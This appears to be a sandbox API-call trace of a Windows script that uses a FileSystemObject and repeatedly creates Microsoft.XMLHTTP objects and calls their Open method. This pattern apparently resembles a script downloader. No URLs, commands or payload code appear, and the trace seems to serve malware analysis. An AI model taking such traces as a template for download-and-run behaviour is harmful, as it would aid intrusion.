	[0368.498] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0368.498] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0368.744] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0368.744] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74f0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0368.744] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0368.745] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0368.745] SysStringLen (param_1=0x0) returned 0x0
	[0368.745] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0368.746] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0368.746] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74f0) returned 0x0
	[0368.746] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0368.746] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7488) returned 0x0
	[0368.746] ??2@YAPEAX_K@Z () returned 0x62f310
	[0368.746] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7488, pUnkSite=0x62f310) 
	[0368.746] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0368.746] XMLHTTPRequest:IUnknown:Release (This=0x49c7488) returned 0x0
	[0368.746] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74f0) returned 0x0
	[0368.746] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74f0) returned 0x3
	[0368.746] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0368.746] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74f0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0368.749] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0368.749] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0368.749] SysStringLen (param_1=0x0) returned 0x0
	[0368.749] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0368.749] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0368.749] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7720) returned 0x0
	[0368.749] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0368.750] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7788) returned 0x0
	[0368.750] ??2@YAPEAX_K@Z () returned 0x62f330
	[0368.750] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7788, pUnkSite=0x62f330) 
	[0368.750] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0368.750] XMLHTTPRequest:IUnknown:Release (This=0x49c7788) returned 0x0
	[0368.750] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7720) returned 0x0
	[0368.750] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7720) returned 0x3
	[0368.750] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0368.750] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7720, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0368.750] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0368.750] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0368.750] SysStringLen (param_1=0x0) returned 0x0
	[0368.751] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0368.751] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0368.751] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7550) returned 0x0
	[0368.751] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0368.751] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7848) returned 0x0
	[0368.751] ??2@YAPEAX_K@Z () returned 0x62f310
	[0368.751] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7848, pUnkSite=0x62f310) 
	[0368.751] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0368.751] XMLHTTPRequest:IUnknown:Release (This=0x49c7848) returned 0x0
	[0368.751] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7550) returned 0x0
	[0368.751] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7550) returned 0x3
	[0368.751] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0368.751] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7550, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0368.752] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0368.752] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0368.752] SysStringLen (param_1=0x0) returned 0x0
	[0368.752] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0368.752] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0368.752] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5bf0) returned 0x0
	[0368.752] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0368.752] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bf0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7788) returned 0x0
	[0368.752] ??2@YAPEAX_K@Z () returned 0x62f330
	[0368.752] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7788, pUnkSite=0x62f330) 
	[0368.752] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0368.752] XMLHTTPRequest:IUnknown:Release (This=0x49c7788) returned 0x0
	[0368.752] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bf0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5bf0) returned 0x0
	[0368.752] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5bf0) returned 0x3
	[0368.753] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bf0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0368.753] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bf0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0368.753] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bf0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0368.753] longjmp () 
	[0368.753] longjmp () 
	[0368.753] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0368.753] SysStringLen (param_1=0x0) returned 0x0
	[0368.753] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0368.753] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0368.753] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7720) returned 0x0
	[0368.754] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0368.754] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0368.754] ??2@YAPEAX_K@Z () returned 0x62f310
	[0368.754] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f310) 
	[0368.754] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0368.754] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0368.754] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7720) returned 0x0
	[0368.754] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7720) returned 0x3
	[0368.754] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0368.754] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7720, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0368.754] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0368.754] longjmp () 
	[0368.755] longjmp () 
	[0368.755] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0368.755] SysStringLen (param_1=0x0) returned 0x0
	[0368.755] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0368.755] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0368.755] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7840) returned 0x0
	[0368.755] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0368.755] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7840, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0368.755] ??2@YAPEAX_K@Z () returned 0x62f330
	[0368.755] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f330) 
	[0368.755] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0368.755] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0368.755] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7840, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7840) returned 0x0
	[0368.755] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7840) returned 0x3
	[0368.756] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7840, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0368.760] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7840, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
